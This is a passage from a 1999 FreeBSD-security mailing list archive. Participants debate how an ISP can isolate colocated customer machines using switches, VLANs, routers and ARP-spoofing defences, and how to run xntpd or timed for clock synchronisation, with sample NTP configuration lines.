Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of > the message > > > > -- > | Cliff Skolnick | "They that can give > up essential liberty to | > | Steam Tunnel Operations | obtain a little > temporary safety deserve | > | cliff@steam.com | neither liberty nor > safety." | > | http://www.steam.com/ | -- > Benjamin Franklin, 1759 | > > __________________________________________________ Do You Yahoo!? Bid and sell for free at http://auctions.yahoo.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 20 14:21: 4 1999 Delivered-To: freebsd-security@freebsd.org Received: from finland.ispro.net.tr (finland.ispro.net.tr [195.174.18.1]) by hub.freebsd.org (Postfix) with ESMTP id 8E6051501F for ; Fri, 20 Aug 1999 14:20:57 -0700 (PDT) (envelope-from yurtesen@ispro.net.tr) Received: from ispro.net.tr (dyn-0-009.tku.netti.fi [195.16.223.10]) by finland.ispro.net.tr (8.9.3/8.9.3) with ESMTP id AAA31483; Sat, 21 Aug 1999 00:17:54 +0300 (EEST) (envelope-from yurtesen@ispro.net.tr) Message-ID: <37BDC5B5.581082F7@ispro.net.tr> Date: Sat, 21 Aug 1999 00:16:37 +0300 From: Evren Yurtesen X-Mailer: Mozilla 4.51 [en] (Win98; I) X-Accept-Language: en MIME-Version: 1.0 To: Chris Malayter Cc: jay d , "Rodney W. Grimes" , freebsd-security@FreeBSD.ORG Subject: Re:(2) multiple machines in the same network References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Thanks for all the answers they have very valuable information but also I need documentation about how I can do the things you are suggesting to me. I did not do this kind of thing before so I am not an expert at this so far. well, I have a cisco catalyst switch here, I am able to define static mac addresses. would it be enough for not letting people sniff passwords? also where can I find information about mac addresses? I wonder what would happen if I enable security features on my switch and define static MAC entries for ports and I have 2 machines with the same ip address ? and other security related stuff about what I am trying to do here? is there any web addresses you may suggest? Evren Chris Malayter wrote: > > Care to elaborate on that? I'm in a colocated facility with multiple > boxes that I am sure our root comprimised, if in fact you can sniff on a > switched network, I'de like to know how you protect yourself against that? > > Chris Malayter > > Mustang@TeraHertz.Net > > ------------------------------------------------------------------------- > Administrator, TeraHertz Communications | | > | InterNIC CM3647 | > Chief Engineer - 95.1 WVUR - Valparaiso,Indiana | | > ------------------------------------------------------------------------- > > "Behavior is hard to change...but character is nearly impossible" > > > On Fri, 20 Aug 1999, jay d wrote: > > > What you really want is a VLAN capable switch. VLAN switches simply > > designate what ports on a switch can see what other ports on the same > > switch. I have to correct you though, Rodney, as sniffing is currently > > possible through switches. > > > > Jay > > > > --- "Rodney W. Grimes" wrote: > > > > Hello, > > > > > > > > We are an ISP and we want to let our customers to > > > put their own hardware > > > > into our network. But the thing we are concerned > > > about is security of > > > > course. How can we protect our system from > > > customers' machines? > > > > > > I would strongly suggest that you place your > > > customers on a ethernet > > > switch. Any of the modern 10/100 switches work well > > > for this. Each > > > customer gets 1 port on the switch, if they have > > > more than 1 machine > > > they install thier own hub connected to the switch. > > > This prevents > > > them from sniffing other customers traffic. Then > > > you need to setup > > > a router between this switch and your DMZ with a > > > firewall rule set > > > that stops all the nasty stuff like RFC1918 nets, > > > smurf amplifier (block > > > the broadcast addresses to all known subnets), etc. > > > > > > > > > > > I have heard about somehthing called "virtual > > > network" but I am not sure > > > > of what it means and even if it is the thing I am > > > searching for ? > > > > > > You don't need VLAN's for this, it's overkill. > > > > > > -- > > > Rod Grimes - KD7CAX - (RWG25) > > > rgrimes@gndrsh.dnsmgr.net > > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > > with "unsubscribe freebsd-security" in the body of > > > the message > > > > > > > > > > __________________________________________________ > > Do You Yahoo!? > > Bid and sell for free at http://auctions.yahoo.com > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 20 15: 1: 5 1999 Delivered-To: freebsd-security@freebsd.org Received: from maxim.gba.oz.au (gba.tmx.com.au [203.9.155.249]) by hub.freebsd.org (Postfix) with SMTP id BAD4914D03 for ; Fri, 20 Aug 1999 15:00:46 -0700 (PDT) (envelope-from gjb-freebsd@gba.oz.au) Received: (qmail 20091 invoked from network); 21 Aug 1999 07:46:58 +1000 Received: from alice.gba.oz.au (192.168.1.11) by maxim.gba.oz.au with SMTP; 21 Aug 1999 07:46:58 +1000 Received: (qmail 1606 invoked by uid 1001); 21 Aug 1999 07:46:57 +1000 Message-ID: <19990820214657.1605.qmail@alice.gba.oz.au> X-Posted-By: GBA-Post 1.03 20-Sep-1998 X-PGP-Fingerprint: 5A91 6942 8CEA 9DAB B95B C249 1CE1 493B 2B5A CE30 Date: Sat, 21 Aug 1999 07:46:57 +1000 From: Greg Black To: Will Andrews Cc: Brett Glass , freebsd-security@FreeBSD.ORG Subject: Re: Securelevel 3 ant setting time References: In-reply-to: of Fri, 20 Aug 1999 11:52:04 -0400 Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > Xntpd is not that difficult. Unlike ntpdate, it can update your system clock > while also acting as a time server for your local network, reducing bandwidth > costs (yes, minimal, if you have a very small network, but still worth time and > money.) It is also more reliable and far more featureful than ntpdate (hey, > encryption compensation!). Just as a bit of extra information, xntpd is useless for small networks that don't have constant connectivity to time servers. In the case of a network that connects to the Internet once or twice a day for just a few minutes, a workable solution is to run ntpdate (with three servers as arguments) on each connection and to use timed on the LAN. The machine that runs ntpdate runs timed with the "-F myname" flag and the others use no flags. If you happen to have a machine that needs its regular tweaks by ntpdate to exceed half a second, then you can adjust the kernel tick a few units either side of its default setting of 10000 so that things stay relatively stable. > As for "large, expensive daemon", that is incorrect. xntpd barely takes 1MB of > total RAM on my machine, and usually close to zero CPU. It may be worth noting that timed is much smaller and uses much less CPU than xntpd. On the other hand, if you do have the connectivity, xntpd is probably the preferred solution. -- Greg Black -- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 20 15:10:50 1999 Delivered-To: freebsd-security@freebsd.org Received: from critter.freebsd.dk (critter.freebsd.dk [212.242.40.131]) by hub.freebsd.org (Postfix) with ESMTP id E6D1815395 for ; Fri, 20 Aug 1999 15:10:44 -0700 (PDT) (envelope-from phk@critter.freebsd.dk) Received: from critter.freebsd.dk (localhost [127.0.0.1]) by critter.freebsd.dk (8.9.3/8.9.2) with ESMTP id AAA06641; Sat, 21 Aug 1999 00:06:41 +0200 (CEST) (envelope-from phk@critter.freebsd.dk) To: Greg Black Cc: Will Andrews , Brett Glass , freebsd-security@FreeBSD.ORG Subject: Re: Securelevel 3 ant setting time In-reply-to: Your message of "Sat, 21 Aug 1999 07:46:57 +1000." <19990820214657.1605.qmail@alice.gba.oz.au> Date: Sat, 21 Aug 1999 00:06:41 +0200 Message-ID: <6639.935186801@critter.freebsd.dk> From: Poul-Henning Kamp Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <19990820214657.1605.qmail@alice.gba.oz.au>, Greg Black writes: >> Xntpd is not that difficult. Unlike ntpdate, it can update your system clock >> while also acting as a time server for your local network, reducing bandwidth >> costs (yes, minimal, if you have a very small network, but still worth time and >> money.) It is also more reliable and far more featureful than ntpdate (hey, >> encryption compensation!). > >Just as a bit of extra information, xntpd is useless for small >networks that don't have constant connectivity to time servers. Not any longer with ntpv4... -- Poul-Henning Kamp FreeBSD coreteam member phk@FreeBSD.ORG "Real hackers run -current on their laptop." FreeBSD -- It will take a long time before progress goes too far! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 20 15:37:25 1999 Delivered-To: freebsd-security@freebsd.org Received: from verdi.nethelp.no (verdi.nethelp.no [158.36.41.162]) by hub.freebsd.org (Postfix) with SMTP id 0DE9314DDF for ; Fri, 20 Aug 1999 15:37:20 -0700 (PDT) (envelope-from sthaug@nethelp.no) Received: (qmail 50746 invoked by uid 1001); 20 Aug 1999 22:35:18 +0000 (GMT) To: gjb-freebsd@gba.oz.au Cc: andrews@TECHNOLOGIST.COM, brett@lariat.org, freebsd-security@FreeBSD.ORG Subject: Re: Securelevel 3 ant setting time From: sthaug@nethelp.no In-Reply-To: Your message of "Sat, 21 Aug 1999 07:46:57 +1000" References: <19990820214657.1605.qmail@alice.gba.oz.au> X-Mailer: Mew version 1.05+ on Emacs 19.34.2 Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Date: Sat, 21 Aug 1999 00:35:18 +0200 Message-ID: <50744.935188518@verdi.nethelp.no> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > It may be worth noting that timed is much smaller and uses much > less CPU than xntpd. That's probably true - but on today's systems it's also for the most part completely irrelevant. On a P-166 here an xntpd process which has been running for 27 days has used all of 255 CPU seconds (ie. something like 0.01%). It has a RSS of 476 kByte. Steinar Haug, Nethelp consulting, sthaug@nethelp.no To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 20 17:29:27 1999 Delivered-To: freebsd-security@freebsd.org Received: from gndrsh.dnsmgr.net (GndRsh.dnsmgr.net [198.145.92.4]) by hub.freebsd.org (Postfix) with ESMTP id 8C2D114C19 for ; Fri, 20 Aug 1999 17:29:23 -0700 (PDT) (envelope-from freebsd@gndrsh.dnsmgr.net) Received: (from freebsd@localhost) by gndrsh.dnsmgr.net (8.9.3/8.9.3) id RAA25131; Fri, 20 Aug 1999 17:27:37 -0700 (PDT) (envelope-from freebsd) From: "Rodney W. Grimes" Message-Id: <199908210027.RAA25131@gndrsh.dnsmgr.net> Subject: Re: multiple machines in the same network In-Reply-To: <19990820192825.15974.rocketmail@web601.yahoomail.com> from jay d at "Aug 20, 1999 12:28:25 pm" To: service_account@yahoo.com (jay d) Date: Fri, 20 Aug 1999 17:27:37 -0700 (PDT) Cc: yurtesen@ispro.net.tr (Evren Yurtesen), freebsd-security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL54 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > What you really want is a VLAN capable switch. VLAN switches simply > designate what ports on a switch can see what other ports on the same > switch. I have to correct you though, Rodney, as sniffing is currently > possible through switches. Yes, possible, anything is _possible_. But the switch goes a long way against the causual hacker. Having to break into a machine, spend enough time to hack the arp code, just to sniff a few packets is hardly worth the hassle. And is usually detected before they get very far anyway due to the massive change in traffic patterns this causes. I already said to put the switch on it's own router port with full and correct filtering. I see a lot of people replying to ``put them on thier own segment''. Now I am not sure if they mean put each individule customer on there own segment, or to lump them all togeather on one segment. My model was to put them all on one switch, with that whole segment of the network seperated and protocted in both directions from any of the ISP's and Internet stuff via a router with filtering capability. Putting 2 customers on any one segment is always a bad idea, it allows either to compromise the other easily by simple tcpdump style sniffing. The customer per router port is probably the most secure model, even more secure than a VLAN switch and single filtered router port, it is also the most expensive model. And in final defense of my statement, the person specifically asked ``How can we protect OUR systems from customers' machines?''. My solution clearly provides that, and just a little bit more, it also protects each customer from each other from casual attacks. > Jay > > --- "Rodney W. Grimes" wrote: > > > Hello, > > > > > > We are an ISP and we want to let our customers to > > put their own hardware > > > into our network. But the thing we are concerned > > about is security of > > > course. How can we protect our system from > > customers' machines? > > > > I would strongly suggest that you place your > > customers on a ethernet > > switch. Any of the modern 10/100 switches work well > > for this. Each > > customer gets 1 port on the switch, if they have > > more than 1 machine > > they install thier own hub connected to the switch. > > This prevents > > them from sniffing other customers traffic. Then > > you need to setup > > a router between this switch and your DMZ with a > > firewall rule set > > that stops all the nasty stuff like RFC1918 nets, > > smurf amplifier (block > > the broadcast addresses to all known subnets), etc. > > > > > > > > I have heard about somehthing called "virtual > > network" but I am not sure > > > of what it means and even if it is the thing I am > > searching for ? > > > > You don't need VLAN's for this, it's overkill. > > > > -- > > Rod Grimes - KD7CAX - (RWG25) > > rgrimes@gndrsh.dnsmgr.net > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of > > the message > > > > > > __________________________________________________ > Do You Yahoo!? > Bid and sell for free at http://auctions.yahoo.com > > -- Rod Grimes - KD7CAX - (RWG25) rgrimes@gndrsh.dnsmgr.net To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 20 20:21:32 1999 Delivered-To: freebsd-security@freebsd.org Received: from mailgw02.execpc.com (mailgw02.execpc.com [169.207.3.78]) by hub.freebsd.org (Postfix) with ESMTP id D403215300 for ; Fri, 20 Aug 1999 20:21:29 -0700 (PDT) (envelope-from hamilton@pobox.com) Received: from woodstock.monkey.net (mercury-1-124.mdm.mkt.execpc.com [169.207.87.124]) by mailgw02.execpc.com (8.9.1) id WAA21139; Fri, 20 Aug 1999 22:19:22 -0500 Received: from pobox.com (localhost [127.0.0.1]) by woodstock.monkey.net (Postfix) with ESMTP id 09B2B1D; Fri, 20 Aug 1999 22:19:48 -0500 (CDT) To: Greg Black Cc: Will Andrews , Brett Glass , freebsd-security@FreeBSD.ORG Subject: Re: Securelevel 3 ant setting time In-reply-to: Your message of "Sat, 21 Aug 1999 07:46:57 +1000." <19990820214657.1605.qmail@alice.gba.oz.au> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Fri, 20 Aug 1999 22:19:48 -0500 From: Jon Hamilton Message-Id: <19990821031948.09B2B1D@woodstock.monkey.net> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <19990820214657.1605.qmail@alice.gba.oz.au>, Greg Black wrote: } > Xntpd is not that difficult. Unlike ntpdate, it can update your system cloc } k } > while also acting as a time server for your local network, reducing bandwid } th } > costs (yes, minimal, if you have a very small network, but still worth time } and } > money.) It is also more reliable and far more featureful than ntpdate (hey, } > encryption compensation!). } } Just as a bit of extra information, xntpd is useless for small } networks that don't have constant connectivity to time servers. Absolutely untrue. There's value in keeping a group of machines synchronized to _each other_, regardless of whether they're also synchronized to the correct time. It is true that _for some purposes_ xntpd isn't all that useful in an intermittently-connected scenario, but that doesn't render it completely devoid of any value. -- Jon Hamilton hamilton@pobox.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 20 20:27:55 1999 Delivered-To: freebsd-security@freebsd.org Received: from Genesis.Denninger.Net (209-176-244-82.inil.com [209.176.244.82]) by hub.freebsd.org (Postfix) with ESMTP id EE085153E5 for ; Fri, 20 Aug 1999 20:27:32 -0700 (PDT) (envelope-from karl@Genesis.Denninger.Net) Received: (from karl@localhost) by Genesis.Denninger.Net (8.9.3/8.8.2) id WAA83968; Fri, 20 Aug 1999 22:24:19 -0500 (CDT) Message-ID: <19990820222419.A83963@Denninger.Net> Date: Fri, 20 Aug 1999 22:24:19 -0500 From: Karl Denninger To: Jon Hamilton , Greg Black Cc: Will Andrews , Brett Glass , freebsd-security@FreeBSD.ORG Subject: Re: Securelevel 3 ant setting time References: <19990820214657.1605.qmail@alice.gba.oz.au> <19990821031948.09B2B1D@woodstock.monkey.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.93.2i In-Reply-To: <19990821031948.09B2B1D@woodstock.monkey.net>; from Jon Hamilton on Fri, Aug 20, 1999 at 10:19:48PM -0500 Organization: Karl's Sushi and Packet Smashers X-Die-Spammers: Spammers will be LARTed and the remains fed to my cat Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, Aug 20, 1999 at 10:19:48PM -0500, Jon Hamilton wrote: > > In message <19990820214657.1605.qmail@alice.gba.oz.au>, Greg Black wrote: > } > Xntpd is not that difficult. Unlike ntpdate, it can update your system cloc > } k > } > while also acting as a time server for your local network, reducing bandwid > } th > } > costs (yes, minimal, if you have a very small network, but still worth time > } and > } > money.) It is also more reliable and far more featureful than ntpdate (hey, > } > encryption compensation!). > } > } Just as a bit of extra information, xntpd is useless for small > } networks that don't have constant connectivity to time servers. > > Absolutely untrue. There's value in keeping a group of machines > synchronized to _each other_, regardless of whether they're also > synchronized to the correct time. It is true that _for some purposes_ > xntpd isn't all that useful in an intermittently-connected scenario, > but that doesn't render it completely devoid of any value. > > -- > Jon Hamilton > hamilton@pobox.com Its not at all difficult to wire a GPS to be the "master" upon which XNTPD syncs. Without PPS output you won't be COMPLETELY accurate, but a few tens of milliseconds should be good enough for most purposes :-) -- -- Karl Denninger (karl@denninger.net) Web: childrens-justice.org Tired of the broken divorce system in the United States and what it's doing to our kids? SIGN the online petition for equal parental - and children's - rights at the above URL. Make a difference in a kid's life today. Real-time chat now available from the above web page To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 20 20:48:18 1999 Delivered-To: freebsd-security@freebsd.org Received: from apollo.backplane.com (apollo.backplane.com [209.157.86.2]) by hub.freebsd.org (Postfix) with ESMTP id 7583314BE1 for ; Fri, 20 Aug 1999 20:48:16 -0700 (PDT) (envelope-from dillon@apollo.backplane.com) Received: (from dillon@localhost) by apollo.backplane.com (8.9.3/8.9.1) id UAA69386; Fri, 20 Aug 1999 20:46:10 -0700 (PDT) (envelope-from dillon) Date: Fri, 20 Aug 1999 20:46:10 -0700 (PDT) From: Matthew Dillon Message-Id: <199908210346.UAA69386@apollo.backplane.com> To: Karl Denninger Cc: Jon Hamilton , Greg Black , Will Andrews , Brett Glass , freebsd-security@FreeBSD.ORG Subject: Re: Securelevel 3 ant setting time References: <19990820214657.1605.qmail@alice.gba.oz.au> <19990821031948.09B2B1D@woodstock.monkey.net> <19990820222419.A83963@Denninger.Net> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org :> Absolutely untrue. There's value in keeping a group of machines :> synchronized to _each other_, regardless of whether they're also :> synchronized to the correct time. It is true that _for some purposes_ :> xntpd isn't all that useful in an intermittently-connected scenario, :> but that doesn't render it completely devoid of any value. :> :> -- :> Jon Hamilton :> hamilton@pobox.com : :Its not at all difficult to wire a GPS to be the "master" upon which XNTPD :syncs. : :Without PPS output you won't be COMPLETELY accurate, but a few tens of :Karl Denninger (karl@denninger.net) Web: childrens-justice.org It's fairly easy to setup xntpd to use a local clock when it cannot find a remote clock. As long as the two don't get too-badly out of sync from each other xntpd can switch between them. I use this trick all the time for machines which are not always connected to the net. What you do is have one machine on your LAN be a stratum 8 time source. You also set it up to connect to a real time source on the internet. When you have internet connectivity the real time source wins. When you don't, the local stratum 8 time source wins. Simple! See /usr/src/usr.sbin/xntpd/doc/README.refclock and other documentation for more information. -Matt monitor no broadcastclient no broadcast (my LAN broadcast address) restrict 0.0.0.0 notrust nomodify server 127.127.1.0 fudge 127.127.1.0 stratum 8 restrict (someinternetip) ... server (sameinternetip) ... driftfile /var/run/ntp.drift To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 20 22:11:28 1999 Delivered-To: freebsd-security@freebsd.org Received: from granite.sentex.net (granite.sentex.ca [199.212.134.1]) by hub.freebsd.org (Postfix) with ESMTP id A525614F02 for ; Fri, 20 Aug 1999 22:11:22 -0700 (PDT) (envelope-from mike@sentex.net) Received: from ospf-mdt.sentex.net (ospf-mdt.sentex.net [205.211.164.81]) by granite.sentex.net (8.8.8/8.6.9) with SMTP id BAA08721; Sat, 21 Aug 1999 01:09:54 -0400 (EDT) From: mike@sentex.net (Mike Tancsa) To: jmaslak@updatesystems.com (Joel Maslak) Cc: freebsd-security@freebsd.org Subject: Re: Switches & Security Date: Sat, 21 Aug 1999 05:22:50 GMT Message-ID: <37be3727.351980871@mail.sentex.net> References: In-Reply-To: X-Mailer: Forte Agent .99e/32.227 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On 20 Aug 1999 16:07:48 -0400, in sentex.lists.freebsd.misc you wrote: > >To compromize a network consisting of a switched backbone... >Internet ---- R ----+ > | > A -- SWITCH -- B > >Let's say B got compromised. > >What B has to do is send ARP broadcasts out, claiming that it is actually >R. Now, it knows R's REAL ethernet address. >--- That was method 1. --- On the Catalysts, you can nail down the ARP address statically and have it ignore any other MAC addresses that would leak out. > >There are MANY ways to invalidate the ARP cache of a switch. Some >crash the switch. Even if its hard coded in the switch not to allow any other MAC addresses out ? ---Mike Mike Tancsa (mdtancsa@sentex.net) Sentex Communications Corp, Waterloo, Ontario, Canada "Who is this 'BSD', and why should we free him?" To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 20 22:17: 2 1999 Delivered-To: freebsd-security@freebsd.org Received: from mail.xmission.com (mail.xmission.com [198.60.22.22]) by hub.freebsd.org (Postfix) with ESMTP id D3C0214FED for ; Fri, 20 Aug 1999 22:17:00 -0700 (PDT) (envelope-from wes@softweyr.com) Received: from [204.68.178.39] (helo=softweyr.com) by mail.xmission.com with esmtp (Exim 2.12 #1) id 11I3U0-0002ei-00; Fri, 20 Aug 1999 23:14:24 -0600 Message-ID: <37BE35AE.23088FB2@softweyr.com> Date: Fri, 20 Aug 1999 23:14:22 -0600 From: Wes Peters Organization: Softweyr LLC X-Mailer: Mozilla 4.5 [en] (X11; U; FreeBSD 3.1-RELEASE i386) X-Accept-Language: en MIME-Version: 1.0 To: Cliff Skolnick Cc: Bigby Findrake , jay d , "Rodney W. Grimes" , Evren Yurtesen , freebsd-security@FreeBSD.ORG Subject: Re: multiple machines in the same network References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Cliff Skolnick wrote: > > Hacked arp code on one machine could return a broadcast or multicast > ethernet address to an arp query for any machine. The switch would then > treat all traffic as broadcast sending it to every port. Since the machines > TCP/IP layer would receive the packet it woudl still be on the network, of > course it would be receiving and dropping a bit more. Performance may be > effected. :) > > You really want the machines on a seperate segment and to be routed instead > of switched. No, you don't, you want them on seperate VLANs, each of which is it's own broadcast domain. Then your trick won't do anything at all. Go read http://www.xylan.com/library/switchbook/index.html and read "The Switching Book II." It's a short read, and will bring you up to date on what VLANs are and how they can protect segments of your network. Then look aroundfor a reasonably priced VLAN-capable switch and learn how to use it. Check out http://www.shopper.com/prdct/721/192.html for a head start on your shopping. ;^) For a better price/port, see http://www.shopper.com/prdct/768/063.html These guys are very hard to beat -- for a few more months. ;^) -- "Where am I, and what am I doing in this handbasket?" Wes Peters Softweyr LLC http://softweyr.com/ wes@softweyr.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 20 22:17:54 1999 Delivered-To: freebsd-security@freebsd.org Received: from mail.xmission.com (mail.xmission.com [198.60.22.22]) by hub.freebsd.org (Postfix) with ESMTP id 62D461543B for ; Fri, 20 Aug 1999 22:17:49 -0700 (PDT) (envelope-from wes@softweyr.com) Received: from [204.68.178.39] (helo=softweyr.com) by mail.xmission.com with esmtp (Exim 2.12 #1) id 11I3XI-0002uT-00; Fri, 20 Aug 1999 23:17:48 -0600 Message-ID: <37BE367A.C6FB893C@softweyr.com> Date: Fri, 20 Aug 1999 23:17:46 -0600 From: Wes Peters Organization: Softweyr LLC X-Mailer: Mozilla 4.5 [en] (X11; U; FreeBSD 3.1-RELEASE i386) X-Accept-Language: en MIME-Version: 1.0 To: "Rodney W. Grimes" Cc: jay d , Evren Yurtesen , freebsd-security@FreeBSD.ORG Subject: Re: multiple machines in the same network References: <199908210027.RAA25131@gndrsh.dnsmgr.net> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org "Rodney W. Grimes" wrote: > > I already said to put the switch on it's own router port with full > and correct filtering. I see a lot of people replying to ``put them > on thier own segment''. Now I am not sure if they mean put each individule > customer on there own segment, or to lump them all togeather on one segment. > My model was to put them all on one switch, with that whole segment of > the network seperated and protocted in both directions from any of the > ISP's and Internet stuff via a router with filtering capability. Putting > 2 customers on any one segment is always a bad idea, it allows either > to compromise the other easily by simple tcpdump style sniffing. > > The customer per router port is probably the most secure model, even > more secure than a VLAN switch and single filtered router port, it is > also the most expensive model. Ah hell, just buy a switch/router and get the whole mess in one box. If you buy the RIGHT one, you can get your wide area/internet link AND your firewall all in the same box. Anyone who thinks a router provides more security than a VLAN switch doesn't understand how VLANs work. -- "Where am I, and what am I doing in this handbasket?" Wes Peters Softweyr LLC http://softweyr.com/ wes@softweyr.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 20 22:22:52 1999 Delivered-To: freebsd-security@freebsd.org Received: from mail.xmission.com (mail.xmission.com [198.60.22.22]) by hub.freebsd.org (Postfix) with ESMTP id A4BF1153DC for ; Fri, 20 Aug 1999 22:22:49 -0700 (PDT) (envelope-from wes@softweyr.com) Received: from [204.68.178.39] (helo=softweyr.com) by mail.xmission.com with esmtp (Exim 2.12 #1) id 11I3bS-0003PS-00; Fri, 20 Aug 1999 23:22:06 -0600 Message-ID: <37BE377D.4C835B01@softweyr.com> Date: Fri, 20 Aug 1999 23:22:05 -0600 From: Wes Peters Organization: Softweyr LLC X-Mailer: Mozilla 4.5 [en] (X11; U; FreeBSD 3.1-RELEASE i386) X-Accept-Language: en MIME-Version: 1.0 To: Will Andrews Cc: Brett Glass , "freebsd-security@FreeBSD.ORG" Subject: Re: Securelevel 3 ant setting time References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Will Andrews wrote: > > Simple xntpd: > > # echo "server time.nist.gov" > /etc/ntp.conf > # echo "driftfile /etc/ntp.drift" >> /etc/ntp.conf > # echo "xntpd_enable=\"YES\"" >> /etc/rc.conf > # echo "xntpd_flags=\"-c /etc/ntp.conf -p /var/run/xntpd.pid\"" >> /etc/rc.conf > # xntpd -c /etc/ntp.conf -p /var/run/xntpd.pid > > This will suit most people. The one embellishment I could add would be to check with your ISP; most have a stratum-2 or stratum-3 time server and would prefer you use theirs to keep the network traffic down. The more reliable latency between your system and their server -- lower hops mean more predictable delays -- will make your ntp client more accurate as well. Thanks for the quickie-config, Will. -- "Where am I, and what am I doing in this handbasket?" Wes Peters Softweyr LLC http://softweyr.com/ wes@softweyr.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 20 23: 1:44 1999 Delivered-To: freebsd-security@freebsd.org Received: from lazlo.internal.steam.com (lazlo.steam.com [199.108.84.37]) by hub.freebsd.org (Postfix) with ESMTP id 2D90E14E21 for ; Fri, 20 Aug 1999 23:01:42 -0700 (PDT) (envelope-from cliff@steam.com) Received: from lazlo.internal.steam.com (cliff@lazlo.internal.steam.com [192.168.32.2]) by lazlo.internal.steam.com (8.9.3/8.9.3) with ESMTP id XAA14295; Fri, 20 Aug 1999 23:00:08 -0700 (PDT) Date: Fri, 20 Aug 1999 23:00:08 -0700 (PDT) From: Cliff Skolnick X-Sender: cliff@lazlo.internal.steam.com To: Wes Peters Cc: "Rodney W. Grimes" , jay d , Evren Yurtesen , freebsd-security@FreeBSD.ORG Subject: Re: multiple machines in the same network In-Reply-To: <37BE367A.C6FB893C@softweyr.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, 20 Aug 1999, Wes Peters wrote: > Ah hell, just buy a switch/router and get the whole mess in one box. If you > buy the RIGHT one, you can get your wide area/internet link AND your firewall > all in the same box. Anyone who thinks a router provides more security than > a VLAN switch doesn't understand how VLANs work. With a nice router I can almost always set up filtering and policys on how ports exchange traffic. It's really hard to create a good packet filter on a layer 2 device, let alone one that can keep state like a freebsd box used as a router/firewall. 4 Port Ethernet cards are less than $500 now so you can build the box with a really low per-port cost. The box costs $2000 for 8 ports at about $250/port. Sure segment your switch into VLANs, then setup a device to route between the and give you some firewalling. Sure there are some switches that do provide extensive filtering and even load balancing, but those are a usually a bit more than $250/port. I think this is similar to the packet filter vs gateway debate, people like to manage at different levels in the network stack. If you want to manage at layer 2 you need to add lots of smarts to the switch to understand how IP packets work for an effective filter. Managing IP at layer 3 is managing a protocol where it lives. As in the router/gateway debate some will say understanding the packets is not enough and you need to understand the payload, hence the gateway approach. Draw a line and stick a stake in the ground where you as a professional are comfortable. I sure do understand how VLANs work, I use them all the time. I'm pretty sure that high end switch you are talking about actually does have a router in there somewhere and is not a simple switch, at least I've never seen a simple switch that will handle a WAN link. All of my switches that I've segmented into VLANs are glued the VLANs together with an RSM or an external router. Now saying that I am always amazed at how far up the network stack some switches will crawl. Right now I'm playing with some switches that will load balance HTTP connections by binding virtual (ip, port) pairs to real (ip, port) pairs, they are sure getting smarter. Cliff -- | Cliff Skolnick | "They that can give up essential liberty to | | Steam Tunnel Operations | obtain a little temporary safety deserve | | cliff@steam.com | neither liberty nor safety." | | http://www.steam.com/ | -- Benjamin Franklin, 1759 | To 